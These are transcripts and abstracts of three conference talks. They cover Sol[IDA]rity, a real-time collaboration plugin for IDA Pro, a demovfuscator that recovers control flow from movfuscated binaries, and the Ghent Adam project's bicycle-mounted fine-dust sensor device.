those individual signals don't really mean a whole lot. You need to understand them in context. And I wish I had time to put together a diagram to better explain how we handle this. But our event syncing stuff, how we kind of deal with and watch and understand the auto analyzer and what the user is doing is we actually use a finite state machine to walk through. We walk through this finite state machine based on the signals we're receiving. So one signal could be interpreted by different ways. It could mean five different things, but it really depends on the context that you capture it. And that's how we try and interpret things. And we're being bitten by the auto analyzer. Yeah. So, all right, let's keep moving through some of the modules. So replay. Very useful if your friend is doing a bunch of reversing and you went to sleep or something and now he's done a bunch of changes. And you want to come back online and get those changes. So basically what we're showing here is we're going to make changes to one of the databases that's connected. And the other one is currently not open or connected. So then once we've made some changes, we will connect the other one and it will sync up to the state of the first one. And we will be back in sync with the other one. You can see the changes happening in the background and now we're back in sync again. And so if you think, you might think, oh, well, what if there's a ton of states? Well, we have a system where snapshots of the IDB get uploaded. You download that and then rebase from there. So it's a very few amount of events that you actually have to sync. And so it really keeps you able to, or you're really able to keep up with that. Yeah. So we're already running low on time. So we got to keep moving. So, status bar. So in IDA, you have, I saw the status bar on the bottom and I'm like, wow, there's so much potential. So I started doing crazy things with QT and I was like, I want to put stuff down there. And so I did. So I put like your server status. You can easily select which server you want to connect to. In case you have multiple, maybe you play with multiple CTF teams or companies or whatever. So you could just right click this nice little thing, pick your server, what not, and go. But we got to keep moving. So invites. So I gave art a toast, right? Like we love toast notifications. So imagine if you can right click somewhere in the database and be like, hey, like here I am chatting across the room. Hey, Nick, I found the blog. It's in this function. And he's like, oh, what function is that? I'm not going to say 0x41bf7 3f anymore. I just say I right click and I say invite Nick here and he just gets a notification. Boom. You can just click that notification and his database gets flown over there. Alternatively, you can also, you know, if you were busy reversing something, you have your nice little Q of the notifications that came in. So you're a little in box. This is kind of what the colors mean. But we got to keep going. So cursors. I said I want to put stuff on the nav band. So the text stories gives you two APIs. One of them refreshes the nav band. The other lets you draw a single line of pixels to the nav band. The refresh API doesn't actually work. So I had one. I had one API and the QT subsystem to do this with. So you can see these are the different users we're working with. If you hover over them, you actually can see their names, which is fun. You can kind of see where people are working in the binary and spread out that way. You know, practically nobody will probably ever use this, but this was part of the vision. We're trying to establish a user experience, right? Yeah. Hex rays. So we said we want to do hex rays. Started working on it. I haven't worked on it in a little while. It is definitely feasible. This kind of demos some of it. This just a little bit old. Yeah. So we are doing some different like type changes and structural manipulation in the actual hex ray window and it's syncing up to the other person who's also within a hex rays window. And so that way you don't have to work at assembly level if you don't want. Yeah. So I mean, we all use hex rays so much nowadays. It's a skill to be good at it. A lot of people just press F5 and are like, oh, this is unreadable. But, you know, there's, you know, we're working on silently syncing hex rays. It's definitely very feasible. If you guys could open up the microcode, that would be great. Or some more SDK or APIs for it. That'd be awesome. I've had to reverse hex rays and, you know, the hex rays plug itself in IDA at some times to understand how some of the APIs work. Anyway, yeah. So now I'm very quick. Just want to show the web server. This is because IDA GUIs can be a little tricky. Maybe you don't want to open IDA to like add someone to a project or something. So, yeah. So what we have is it's basically a very simple web server here. You can see like all the projects that you are on. You can see recent actions that have happened. Here's like an overview of the projects. You can see information like, oh, these all have sync enabled. That one's private. So on you can get like a view of the directories so that you can kind of visualize that better. And then further, you can go to a project and like see very detailed information about what's been happening in it. So you can like get an idea of how the reversing is going and as well as be able to see like all the IDBs that have been uploaded in case you want to like take one out of the system and use it personally or something. Yeah. And then so the other thing is we really want like fine grain control through the web interface because it's much easier to implement that kind of like control through all the different forms and everything. So you're able, this is the easiest way to add users to projects, change project details and everything so you don't have to go into IDA to those kind of tasks that don't actually involve reverse engineering. So yeah, that's pretty much the web server. Yeah. So yeah, there's a, you know, there's actually a lot of, there's a lot more that we did not cover. We only have 30 minutes. So we, you know, we're out of time basically. We showed a bunch. There's a lot more planned. We also like to release as a beta. We submitted for a black hat and we're hoping to release it or beta it out then, but that didn't pan out. So it'll be betaed soon. That's all we can promise. There's a lot of other really cool stuff that we wish we could have shown you guys, but hopefully soon. So, you know, follow us on Twitter. The website we're going to push up soon just, you know, so there's some central resource. And then we'll have all the demos that we showed today if you want to look at them. Yeah. And we'll, you know, we'll put these slides up and yeah. So that's all we've got. Yeah. Yeah. Yeah. So, yeah. So the, we were as mentioned earlier, how the question. Yes. Yeah. Sorry. He was wondering if there was some sort of like version control for the actual like databases as you're going along case somebody like completely messes up a database and you can't undo it. So as I mentioned earlier, we have a system that will like make snapshots of IDBs as you're going on so that you don't have to sync up as many events. So you could easily tell solidarity to use one of those as the most recent one and then just move on from there. And the other ones will just be like put aside and you can download them and do whatever if you want, but they won't be used for anything anymore. Yep. Yep. So, you know, we maintain a history of all the events that are flying over the server that, you know, are more detailed, precise events, not just the stuff that was spewed kind of like collaborate. We, there, we maintain this whole log of them as well as various snapshots of databases that automatically get uploaded from a user in that session. So every 500 events, let's say a database gets uploaded. And so anytime someone else joins that session now that database gets pulled down and they, you know, they join the session that database will get pulled down and then any events they have missed that have been, you know, occurred since then will be played, you know, which is going to be. Yeah, and you can do the same thing with any of the databases pretty much that have been in like the snapshots and that way you could basically go back in time if you really need to. Yep. So any other questions? Yeah. So divergences offline is just difficult, right? Like there is no good solution to that. So, so one thing if you have to make a lot of changes offline, you can basically create that new snapshot then and people who want to work from that kind of like fork of the thing can then go on from there. But if you're the idea is you're doing most of the stuff online. So ideally you would be able to connect and send like record the events that you've been making. Otherwise, the server doesn't know what you've been doing. Yeah, the simple answer is basically get forked. So, so yeah, I don't, I don't think we really have any more time. Unfortunately, we're already over. But, you know, hit us up will be around for the rest of the day. Or otherwise, yeah, hit us on Twitter. Yeah. Yeah.
|
Reverse engineering is an exercise of exploration and digital cartography. Researchers slowly unearth bits and pieces of a puzzle, putting them together to better understand the bigger picture. Binaries, like puzzles, can be put together much faster in collaboration with others. And with services such as Google Docs, Office 365, or Etherpad, it is easy to recognize the power and effectiveness of real-time collaboration in the digital space. Unfortunately, reverse engineering as many know it today is almost exclusively an individual experience. Our present reversing tools offer little in the way of collaboration among multiple users. This can make reverse engineering tedious and wasteful in a fast-paced team setting. In this talk we’ll be publicly unveiling Sol[IDA]rity, the newest collaborative solution for the popular disassembler IDA Pro. What started as a simple plugin to sync IDA databases between users in real-time, soon evolved into an interconnectivity platform for IDA with endless potential. Join us for a glimpse at the latest generation of collaborative reverse engineering.
|
10.5446/32753 (DOI)
|
All right, we're ready to get started now with Julian and Clemens. The movement scatter is gone. As many of you know, this is a follow-up talk on the Moffice Cater talk done by Chris Thomas last year. My first quick question would be who attended that talk or saw it recorded online? Okay. That's quite a good number. Actually quite a bit. Our subtitle is recovering from soul crushing our E-Nightmares, which is quite a reference to last year's talk. As you can see, this is progressive, so we're still working progress software writing a de-office cater. We would like to stress the fact that this is not a personal attack on Chris Thomas. Also we would like to anticipate that our de-office cater does resubstitution of those move instructions very carefully, I would say. All right. A little bit about us. Who are we actually? We are, well, mainly CTF players. We play for a team from Germany called Huckabshaw, and we invest a lot of time into solving crazy exploitation, reverse engineering, and cryptography tasks. Whenever we are not playing CTF, then, well, I am trying to get a PhD in the field of program analysis, low-level program analysis, and de-office catering. Clemens just finished his bachelor's thesis. He also had the doubtful honor of writing the thesis on de-office catering, so he probably now knows that move code very well and can elaborate another little bit later. Okay. To get us in, I will try to cover the office cater at a high level, such that you know how it works or how it is made up internally. So the story of office catering is probably like this. There is a strange discipline amongst computer scientists to find Turing completeness where you wouldn't expect it. And the original paper on this was by Stephen Dolan in 2013, where he summarized that even if you remove all instructions from the Intel X86 instruction set, but the move instruction, then you are still not losing Turing completeness, which is kind of surprising, I would say. And then two years later Christopher Domus came and implemented a compiler, actually, who actually did that, and that was released at recon 2015 last year. And he did that in two ways. So he had one version that he called the office caterer one, which translated from brain fuck to X86 move, which is not so surprising because brain fuck is quite low level, but he also spent great amount of time to write a C to X86 move compiler, which is basically implemented as a virtual machine and we will cover some of the internal workings right now. So we have the two references there if you are interested to read up on that. So let's assume we have a program that looks like this. So five basic blocks that are luckily happily jumping to each other and basic block three assumes that there is a loop. And then what many of you might know from malware or from industry standard office caterers is something like this called control flow flattening, where the office caterer inserts a dispatcher that actually then does the basic block scheduling for you. So the left hand version clearly conceals how many possible paths are there through the program and all you can tell any more what basic block is scheduled after what basic block. And modification now takes the exact opposite way and creates something like this. So instead of flattening it, it does something we call linearization, which just aligns all basic blocks into one linear block that loops infinitely. So how is that implemented internally? Well, there is that static in a station stop, which basically registers two signal handlers, one for sick ill, which basically is a trick that the program is its own sick handler. And that makes that basic block four in order to jump to basic lock zero in that image does not have to trigger a explicit jump, but could instead just trigger a sick ill. In Thomas case, it's a move of a segment register into a general purpose register. Well, to start execution over again. And of course, those signals have to nest. And the other one is, of course, you don't want to lose your ability to talk to the operating system, which is why he registers another signal handler for the exact fault, which basically jumps to a dispatcher which then calls external library functions. So it does that by triggering that fault. So in context of multiplication, dereferencing zero means well, to a library call. Okay, to best understand how this is possible at all, we have a well, quite verbose high level C program here. And I know that slides and code don't like each other very much. But what this program should do is it calculates the factorial of the number that is passed in our in arc v one. And if you compile that program as printed on the left, and you would get a control flow graph as depicted on the right. So how is that done? Well, one observation is that each instruction of each basic blocks, block obviously needs to be executed each time it is passed, right? So whenever that loop retriggers, we have to execute all instructions again. And the problem is that not all instructions should manipulate our state. So the main trick of multiplication is actually whenever you introduce a variable, you actually introduce two variables. So you introduce an array with two entries, and the first entry of that array is a discard location with trash data. And the second entry at index one is the real data you're interested in. And if you follow that idea, then you can program a program like you can see in that do why loop from line 12 to 24, which basically, well, takes a state variable, a global state and evaluates that state, whether it is, well, in our case, we have state zero and state one. And if it's true, then it does the assignment on the left hand side, the I and one, you can see line 13 to the real data. And if it's not, then it's done, the assignment is done to the scratch data. And well, if you apply that iteratively, then you get that program calculating the factorial. Quite interesting. And in context of multiplication, this means that whenever we talk about something prefix cell, we mean actually an array holding two variables and one of those variables is scratch data. So a basic block in multiplication is then always starting with a sequence that takes that target register, which basically is equivalent to the state, but we saw here and checks whether let's, for example, take a look at basic block three, whether the current basic block is the basic block that should be executed. And if it is so, then that on variable is set to true. The transformed semantics of the basic block three now written in move code are executed. And at the end of that basic block, there is the sequence that the basic block checks whether the next basic block should be basic block three or four. Or the basic block three was the one that looped in the beginning. And then execution goes on. Now one thing to remark is that arithmetic doing only move is quite tricky. Domus implemented this using lookup tables. So you can imagine doing arithmetic for each and every possible instruction, process or instruction can blow up the binary quite a bit. And if we look at some statistics here, for instance, on the right hand side, we have a vanilla, we have vanilla compiled programs. And on the left hand side, we see the Mophisk versions. So we can see that program sizes increase dramatically by a factor of up to, well, 2000 almost. So notes that's kilobyte versus megabytes. And also execution times because that loop has to be executed all over again is, of course, also quite awful. So if you compare the SHA-2 256 example, which basically just hashed 10,000 bytes together, took almost, well, a factor of what's that, 4000, a lot of times longer than the original version. So our thought when it saw that it was, well, it's quite cool, but it's also very slow, right? So who would ever in any productive way use that? Opposition technique. Yeah, well, and of course we forgot about CTF organizers. So of course it didn't take long until, well, challenges appeared during CTFs where people thought it was a nice idea to torture CTF participants and throw Mophisk-cated binaries at them. And at that point, we said, okay, no, this has to change. And if we deal with that, we deal with that rightly. So there's two easy solutions that we explicitly rejected. Number one, the brainfuck Mophiskator, well, is easy because there is a one-to-one relationship from brainfuck instructions to emitted move instructions. You could just statically resubmit it, resubstitute it and you're done. Same goes for the C version, but, and that's quite cool, the original implementation of the Mophiskator also has a hardening.ppy script lying next to it. And what it does is it, well, prevents exactly doing those pattern-based, sort of pattern-imagined based approaches. So it does register renaming, it does instruction reordering, it shuffles quite some bits, some bits. So we can't do any pattern-based approach anymore. And we're really forced to look at the semantics. And how we do that is now covered by Clemens. So first of all, when we designed the Mophiskator, we had to think about what were our goals because analyzing the Mophiskator binary, as you saw, can be quite tricky, quite difficult, even especially if you have to take into account that the extra hardening gets applied. So you can't, like Julian just said, you can't statically translate it back. So we sat down and thought about what would be the main priority. And we came up with staring at the wall of instructions is really bad and annoying. And it would help a lot if we actually get the control flow back. And that was our main objective. Apart from that, we wanted to retrieve symbols like what table does what operation. So that if in the end you load it into IDA, you know exactly what's going on even though you have quite an amount of instructions so you can figure out what is happening. And as a sort priority or as least priority here is replacing the lookups by its respective instructions, by its accessionistic instructions. Yeah. So that are the goals. And to recover the control flow, we do it in four stages. And in every stage builds on top of the previous states. So in every stage we acquire some knowledge we need in the next stage. And in the beginning, we don't have any knowledge about the program apart from that it's Mofius gated and that it contains the initialization. So we analyze the setup. After that, we have enough knowledge to retrieve all the labels. Then we can look where the jumps are and where are they leading. And from all this information, we can finally build the control flow graph again. And well, that was our main priority. So let's get right onto it. How do we analyze the setup? As Jürgen mentioned, the first initialization sets up to signal handlers to do external calls and also to loop around. And it set up the stack as well. And the interesting part is here marked as one. It is part of the main loop actually, but it is also steadily in the binary and also not prone to any hardening because it's emitted only once. And that's at the time where the object files will get linked together or right before that. So you won't see any hardening on this part. So pausing it is quite simple. And as you see, the on variable will be initialized here. And the first statement, a selector at place init will be set to one. And init is a variable that is statically set to one in the image of the binary. And after that init is set to zero. That makes sure that this basic block will only be executed once in the beginning of when the binary is first started. And then it calls main and access. It's basically just setting up the execution of the other basic blocks. So from here, we know where is a cell on and also we know where is on because, well, if you have this selector, we have on as well. And on top of that, we now can recover the labels. To do this, we run over the entire binary and pass instructions using capstone. And when a label occurs, because the way chumps are a more instruction itself cannot target the instruction pointer. So it needs those entry points into labels where the execution is set to on. And they look like the code here, the two lines. You have the cell on, which is set to one under a special condition. And we now have to evaluate the condition and find the label, therefore. And on the right side, you have an example here. We are using lookup tables and because it's a 32-bit binary, you can't have full 32-bit lookup tables. So it will split into multiple lookup tables, which makes the separation quite a vast amount of more instructions. And we have to put them together. That's the challenge here. And also in the beginning, we don't know what the lookup tables does. So instead of seeing the equals equals here and seeing the and here, you would just have addresses, addresses into tables. And now we have to beat the lookup tables. And what is the best way to beat lookup tables? Well, you just use lookup tables. This works for binary and Boolean, for binary operations, we access a specific element in the lookup table, which is distinct to this lookup table. So we make sure not two lookup tables have the same value there. And for Boolean operations, we calculate the score based on the results. For unary operations, we hash the tables, which works quite good. Yeah, now we have figured out what lookup tables fit to which address. And now we can translate back. And now we have here the stream of instruction, which is exactly what I showed before. You might can identify the equality lookups in the end. Not? Well, I guess so. The worst part is we still have to teach our computer how to work all the instructions together. So what we do is we start at the end. We know that when we assign one to cell on, that the result A is some kind of condition. And we start there. We do a taint analysis going backwards at first taint A. And the way taint propagates to move code backwards is quite obvious and quite easy to implement. So it works really well. And we can generate a graph out of it. And this looks way more handleable. I think you agree. And now from this graph, we still have a graph and we still have to handle it somehow. So what we're doing next is we take this graph and translate it into our expression and feed it into an automatic theorem proven, namely set three. And this automatic theorem proven, we look at it and we ask, well, what value does target have to take so that A evaluates to one? So under which condition will cell on be set to one? And it will output us a constant function which is just equal to label. So we then have the label and we just remember where the label was and what's the label. So the virtual address and, well, the label. And this brings me to the third point. We have to identify jump targets. And all those instructions have in common that they access our targets. So we do it very similar to the analysis of the labels. We start from the selector of the target and see if it's toggled under some condition. Like you see in the conditional jump, all the others have null condition because jumps will always be executed, returns will always be executed, indirect jumps will always be executed. And then we also have to acquire the label, which we find in the subsequent instruction or it could be something more complex like in the indirect or return case. And it's not easy to distinguish those two cases, but with attained analysis of X, you end up either with a very simple case where just the stack gets dereferenced or you have something way more complex and the complex case is the indirect jump, the stack is obviously dereter turn. And we then remember the position of the jump and where it leads us. This gives us a bunch of data. First we just have those labels and the jumps on the left side, A, B, C, D, E, F. Then we connect them in a meaningful way such that a label will just execute to the next block. And then we simplify the graph and we get on a control flow graph on the right. And that's all we do, all we need to do to recover the control flow graph. Yeah, right. But so what? I mean, you don't remove all the moves that might be the biggest concern right now. Yeah, but it has the one that it can still handle hard executables. We are doing a trained analysis so it doesn't matter how the registers are named. It doesn't matter in which order they appear because, well, it doesn't matter to the trained analysis. The data gets propagated equally. Also, we get the control flow graph, which is a major help in reversing the binary in the end. We also, what I didn't cover is we generate a patched binary, which we then can execute or which makes it looking at it in either or something else way more pleasant. We generate it as symbols because, well, going all the way, recovering the labels and the symbols, we go over all the tables. And so on the way, we just generate those symbols and we get them into a form that Ida can understand. So if you load it in the end, the patched binary with the symbols into Ida, you have quite a different experience than looking at the Moffi-scatted binary. Right, and last but not least, we're using all those fancy new frameworks. So if Mr. Njendan is sitting in the audience, I don't know, the creator of Capstone and Keystone. So thanks a lot. That really helped in creating the Moffi-scatter. And also thanks Flyout to Microsoft for creating a set three automatic theory in Prove. And we actually had a demo. Yeah, it was a small demo, but due to ongoing problems and due to the fact that everybody wants to go to the coffee break, I'm just quickly covering what the idea and the takeaways of that demo were. So we have this simple crack me. And I'm sure that most of you will almost instantly be able to tell what the needed input should be for the F gets in line 10 in order to get the smiley face. It's not the sad one. But what we would have done is then we Moffi-scate this and then we throw this into the demo fiscator. And then to prove our point, we would have taken this fancy new anger binary analysis platform framework. And the cool thing is that anger comes with a simple execution engine that actually works for low level programs. And what you can then do is you can say, okay, whatever the F gets returns is symbolic data. So treat it as a formula, then execute the full program from line 10 to line 16, apply all those transformations to the formula, and then constrain RES, the result variable, to be zero. And from that, you can feed it again into a theory improver. And you will get actually the correct solution. And I know this is pretty lame that we can't show that live right now. So all I can offer is, well, I have it there on my notebook, but unfortunately not on this one. Yeah, just come to us. If you're really interested in this, we just invite you, please come to us after the talk and we will show you that it actually works after demo fiscating it. And one of the takeaways also is that demo fiscation takes, well, less than a second. So it's almost as fast as obfuscating it. So to conclude, this is the way you can reach us, our email addresses, also our PGP fingerprints. And of course, we are open sourcing everything. So the source code of the demo fiscator, which is by the way about 4k lines of code. So there's many, many, many, many things we couldn't cover. Also a summary of the demo fiscator. And if somebody wants to torture himself even more, then there's claimant specialized thesis that you might reach with, well, which might be quite a moving experience on 60 pages. And that's all we got for now. It covers the basics of the more fiscation more in depth of the demo fiscation as well. So it might be interesting to read, but it isn't necessary. This presentation went over much. Just shut up. It's just, we're at that point. All right. Okay. Thank you very much. Thank you. Thank you. Bye. Bye.
|
After last year’s talk by Christopher Domas titled “The M/o/Vfuscator”, we spent a great amount of time to analyze the inner workings of the famous one-instruction-compiler. We are happy to announce and release the (to our knowledge) first demovfuscator this year at recon0xA. This talk presents a generic way of recovering the control flow of the original program from movfuscated binaries. As our approach makes zero assumptions about register allocations or a particular instruction order, but rather adheres to the high-level invariants that each movfuscated binary needs to conform to. Consequently, our demovfuscator is also not affected by the proposed hardening techniques such as register renaming and instruction reordering. To achieve this, we use a combination of static taint analysis on the movfuscated code and a satisfiable modulo theory (SMT) solver. We successfully used our demovfuscator against several movfuscated binaries that emerged during several CTFs during the last months (Hackover CTF, 0CTF and GoogleCTF) proving that it already can handle real-world binaries different from the synthetic samples created by us. Our demovfuscator is under active development and we are working towards our next, ambitious goal: Generically getting rid of the instruction substitution and generating a much more compact and readable result. We will share our insights on this topic as well.
|
10.5446/32400 (DOI)
|
Hello, welcome. This talk is about Adam. My name is Dagwijers. I've been here a few times in the past, but that was five years ago, two children ago, some weight ago. But it's nice to be back. This time it's about a project that I'm involved with. Myself, I'm a freelance, well, system administrator or system engineer. So not really something that is related to this project, but anyhow. The project is a time-lapse project. A time-lapse is an organization, it's a non-profit organization in Ghent, which is like a fab lab. It brings people together to work on creating stuff. They have laser cutters, 3D printers, CNC, freezing machines, I don't know if it's in English like that. It's called that in English. But it was founded in 2010 out of a different organization, but they reoriented to becoming a fab lab. And they also do projects. So from time to time, I think twice a year, they think of new projects to do and motivating people to, as a volunteer, to work on those projects. These are citizen projects in the sense that they try to motivate just citizens, not professionals, not science people. It's not paid for, so it's purely on a voluntary basis. Time-lapse also does workshops related to creating stuff and using the machines and a lot of other stuff as well. Also around project management and things that are also needed to have successful projects. They also do boot camps, they do Arduino jams, like 48 hours Arduino jams. And they also pay for residences for art students or students that have a nice idea, they have to answer to a call for papers. They have, I think, two apartments where people can live. So it's usually international people that can add something to time-lapse and at time-lapse can also add something to their project. They also use their space for people for free if you want to have a space where you want to work. So you don't even have to be a member to make use of their space. And they have free Friday lunches. It's supported by the city of Ghent and the Flemish government, but it's not self-sufficient, so they do require you to pay something if you want to make use of their equipment on a continuous basis. Except, of course, if you're involved in one of those creation projects like I am with Adam. So what does it look like? It's something like this. It's actually much larger, but this is a view of what it looks like on a busy day. And the nice thing, obviously, is that it brings people together. So you learn a lot if you're stuck with something. You can ask anyone. Using the machines or even technical stuff or explaining something. So it's like Frostconn a bit. We have a very nice logo because we also have designers inside of TimeLock, which is also nice because you can do something that looks more professional as well. Also designing, what do you call it? Product design, like building cases and stuff like that. So that's very useful because usually someone is very good at a certain thing and here you have everything mixed. So the goal of the Adam project is actually to monitor the air quality in Ghent. Specifically in Ghent because we want to start small. But the aim is to give the user direct feedback of the air quality at the location where he is. With a little bit of delay probably, but good enough for people to understand if there is an issue with the air pollution. But also another thing we would like to do is to collect this information and publish it because we think that open data can help governments make better decisions. And so the idea was to create a mobile device that collects this information from time to time. It uploads it to a central location and that data is then because it's raw data, the device itself doesn't do a lot of calculations or mathematical or statistical manipulations. We do that centrally based on all the information we got. And obviously the idea is to create public awareness as well. And thanks to some of the marketing people that we also have in the project, we have a very fancy idea of trying to get to the public media. Because we really want to get some air play on television and stuff like that once we have this thing going. And why are we doing it? Because we can. But not just that. The idea itself actually originated in the fact that one of the founders of the time loop project delivered a son, a baby boy to this world. And he had a long problem. And he was still very sensitive to air pollution and especially to fine dust. And this project, at this moment we are only focusing on what they call particulate matter, which is fine dust. But obviously once we have this finished and the second revision of this device, we could add more sensors. But the problem, why did we focus on fine dust? It's because it's the least known, we have the least data of fine dust. So usually the CO or NOX or all those ozone, these are very easy to monitor and there's lots of data around that. But particulate matter is really something that is, you need specific calibrated devices which are quite expensive. So yeah, there's not a lot of information about it. And if there's information, it's usually an average over a long period. And the thing with air pollution, it's not about what the average is over a year, it's what you have, where you are today on a continuous basis. So that's why we don't think what the government is showing is actually relevant to us, to the citizens, to everyone. So yeah. So we live in the beautiful city of Ghent, which looks like this. We think it's the most beautiful city in Europe, the world maybe. And we have a lot of bicycles. It's a bit like Amsterdam. It's a student city, a lot of students, I think 60,000 students. The population is 260,000. At those students too, it's more than 300,000 people. And the bike is very, very much used. So our idea was to make a mobile device to put on a bike. The beautiful city also has two highways and one highway going directly into the city, which is part of the problem we think. And you can see that from this, this is a picture of last year, it has been renovated while we preferred maybe to have it demolished instead. And I live somewhere at the end of that. So it's green, but don't let the trees fool you. It doesn't help a lot. So in the big city of Ghent, we have only two official air pollution stations. And they were strategically chosen to put somewhere, I think more than one and a half year, to decide where to put it. Far away from a lot of things that create pollution. And we do meet the European levels, which I can show you later, are quite broad. There is an average for the whole year, so it doesn't matter how many spikes there are. And then there are, I think, 35, you can go over the limit, 35 times a year or something. But as I said, those yearly averages don't mean a lot and it's micro measurement that we actually need. So, and that's what we want to change. Obviously, like I said, it's not just particulate matter that makes up the air quality, there are other factors. But as I said, it's the least known variable. The city council is taking the environment seriously. That's what I say. So, yeah, we hope that they do. We'll see. There is obviously a lot of frustration with some people because it might bring the city into a bad or negative publicity. There's also some negativity from the, how do you call it, the Emo? Is it Emo in German as well? The people that sell houses, they are afraid that this information will lower the prices for houses on, because usually the prices of the houses where the prices are high, there is also a lot of pollution because it's those places where a lot of traffic or a lot of, you know, the buses are, the trams are, things like that. So, it's very convenient, but also very, very, well, dangerous to our health. The most important thing about my presentation is in fact the technical side, because this is a technical conference, and this is what the device looks like. It's going to change a bit, but this is how it looks like. It consists of a few things. Let me first talk about the goals we have. We want to create an open device that we can build locally, because the idea is if we are going to create this, this is not something that is specific to Gantt. Everybody could help on this, could use the same device. So, we want to build something that everybody can build themselves. So, the components we use should be cheap, should be easy to get hands on. The code is open source, obviously, documentation is open as possible, because we have to write it first. The design of the casing, it's, we're using general things that you can buy everywhere with 3D printed pieces. It's a modular design, because obviously people want to have different combinations of things. So, the idea is that you can swap drivers, or in some later version we can detect which sensors we have, and we will automatically adapt to that. We try to reuse as much as possible in open source, because we have limited resources ourselves as well. And we believe in open source, obviously. And the most important thing is that the data will be open. So, it's open for everyone to make use of it. Which also has the danger or threat that those people that want to put us in a bad spotlight can obviously use that data to manipulate it as well. And that's why we have to be very careful to indicate what it is, because we're not a scientific project. We measure stuff, but as, yeah, the information we gather is raw data, cannot use it immediately. So, we hope that by putting this raw data out, we also attract scientific universities that are going to use this information to do something with that. So, we have to be careful, because it's raw data, and as much as we'd like to tell people, walk here and not over there, because that's dangerous, we cannot simply say that. I will go into that when I talk about sensors as well. So, this is the device. This was the first prototype when we knew what pieces we were going to use. This is when you're building it and testing stuff. Once you're certain that it works, it looks like this. Less connections. Well, the connections are actually fixed. What are we using? Those that know a little bit about hardware have seen some things. We used the Sparkfen ESP8266, which is in fact a Wi-Fi chipset. We started off with something different. The original idea was to use Bluetooth for communication and use a normal microcontroller, but this is actually quite affordable, and with Wi-Fi on board, we can use Wi-Fi, which is much more convenient for sending data back to our own servers. Almost all of the sensors are I2C. I don't know if it's... How do you call it? I2C. A lot of things... I2C. Okay. I remember that. What did you say? InterIC. I see. Okay. I didn't know. Yeah. Let me add a big disclaimer. I'm not the smartest guy in the team we have. I only joined three months ago. I learned all this stuff by doing it. I know I square C now a bit, but I'm not writing the drivers myself. I did write a lot of the code, but not this part. I'm not that experienced with electronics myself, although I'm learning, so it's getting better all the time. We're using the PPD42. It's probably not that known because it's very specific to what we're doing. Let me put this down. This is, in fact, the device. The device actually has a resistor underneath the heat of air, which we are probably going to remove because it's also using up a lot of the battery power and the air is sucked in underneath and it's pulled out at the top. This is a black room where there's a high sensitive light sensor. There is a light beam that actually bounces off to find this part. We get an interrupt for each particle that we see. If I come back to what I said earlier, the scientific value of this, usually the fine dust values that are used are based on micrograms per cubic meter. This only counts dust particles. Dust particles, actually we have two types of dust particles. Those that are smaller than 10 micrograms and those that are smaller than micrometers and those that are smaller than 2.5 micrometers. That's the only two factors that we have. We have to do some calculations to and probably calibration with real devices to have a sense of how good the air quality is. But it will always be something that is relative to other devices. We cannot say compared to the official way of measuring it's this. But if we know because we have fixed stations and maybe at some time more fixed stations that are calibrated, if a bike crosses that and it senses that information and we have hundreds of bikes crossing those, we can do statistical analysis of all that information and compare it. Then we can say this is better, this is worse. We don't know exactly how much better or how much worse. We could know that but not with some difference as well. But it will not be real scientific or it cannot be used as raw data anyhow. In the device we need some things to help us. We have an accelerometer to know if we are moving or not. We also use it to see if it's been shaken. I will come back to that as well. Obviously we want to know when we are moving because we want to go into a low battery mode if we are standing still. If we are not moving we can also test the Wi-Fi to see if there is a Wi-Fi as an ID that we know about and to try to get our data out. Was there something else I wanted to say about accelerometer? The humidity sensor, there is a humidity sensor on it. In fact the humidity sensor does temperature but the accelerometer has a temperature sensor as well. The air pressure sensor has a temperature sensor as well so we have three times the same information. The humidity is important because there is a relation between fine dust and humidity. If we want to take that into account as well we need this information at the same place and the same time as the other information. Air pressure is the same. With the humidity sensor and the air pressure sensor we also want to see if it's raining for instance. We don't know if we can get that out of there but it may help us to get this information. We could obviously also take into account other weather information that is public like the air, where the air is coming from and the speed of the air. But at the moment we are not taking that into account but this is something to correlate as well so it would be nice to see what the influences of air at a certain location on the air pollution. Then we have the biggest trouble maker in our set, it's the GPS. Why is this a big problem? The GPS requires a serial communication. We are limited in the number of pins we have on this SparkFund ESP8266 and it's a pain for us. There are GPS devices that have an I2C interface and in fact this one has one as well but we cannot make it work for some reason. We try to connect those pins but we cannot make it work. If you look on the internet for I2C GPS's they all have this electronic stuff in between to convert between your serial and I2C. The idea now with a lot of regret because I want to keep things simple but the only affordable way to do this except for buying the I2C GPS which is quite expensive, it adds 15 euros or 20 euros on top of the price we have now. We are thinking of using the Arduino PoM mini, create firmware, actually there is a project that creates firmware for serial to I2C interfaces so we are now looking at that but this is the part that is not implemented now. In fact we are using the GPS with a serial interface at the moment and we don't have a buzzer and that's how we do it. But actually we need two pins if we also want to talk to the GPS to configure it properly so actually this is the way to go. Obviously if you have better IDs. Yes, yes, indeed. The original ID was to only have to read from the GPS but the problem is it's sending a lot of information, it's buffering, it makes no sense at all and you can configure the GPS to only give you information every one second or things like that or you can also say I only want this type of information with the more advanced GPS but indeed if we can have this one process the information we have it in the correct format that we need. The communication, the communication of the device but I will show you later we are using GCN for communicating everything well to the serial console for testing and also to send it out over Wi-Fi. So the information, well if you want to have the details about how we store the information we can discuss this later because we also created something fancy to use as little storage as possible. There's also we are planning to also add an ID to see memory, to have more memory for buffering more information but at the moment for testing we don't need it yet. So as I showed you this is the current device. When I joined there was not a lot of code produced we did have some test code for the individual sensors and when I joined I didn't know what I could help with so I started with documenting everything which is nice because then I know a little bit about the different sensors and how the project was conceived but I very quickly started to write the main loop and the main loop is something that is I knew a little bit of Arduino that you had the setup and the main loop but I didn't know how to get something like this going and the first time I tried to implement this I had a lot of if-else statements and it was a lot of it was interesting because it learned to me it was interesting to learn how this would work but then the second revision it became better we started to use cases and then I had an epiphany which is probably for most of you very obvious to use a state machine. A state machine and a state machine written with double cases double switch blocks one for determining which state we are in and changing states and the other one to to to have the state transition as well because we want to run something when we are in one of the states we want to run something continuously and if we're going to move from one state to the other we have to do some preparation or breaking down stuff while we're moving and so there are if you look at the code and I can go over that if there's interest and there is if there's time it looks very neat now so I learned a lot with that as well. The thing is when we start the device the start state is actually not a real state it's the beginning it's what we are when we start the device and we quickly go into sleep mode and depending on information coming from the sensor we go to different we go to different states so if you're in if you're in sleep mode we're not moving because if we're moving we go to the GPS test state if we're not moving but it was shaken we go to the config state which brings up a wiffy access point where you can connect to and then you can configure the SSIDs you want to use for uploading your data you can also say if the device is stationary or not because we also want to have non-mobile devices at some point and we also want to know if the device is located in-door or outdoor because we are for the project itself we're only interested in outdoor information but as a person I would like to know what the information is indoor so that's something that you can configure in the config stage and after some time or okay is pressed or whatever we go back to sleep if we are moving we enable the GPS and we're waiting until we 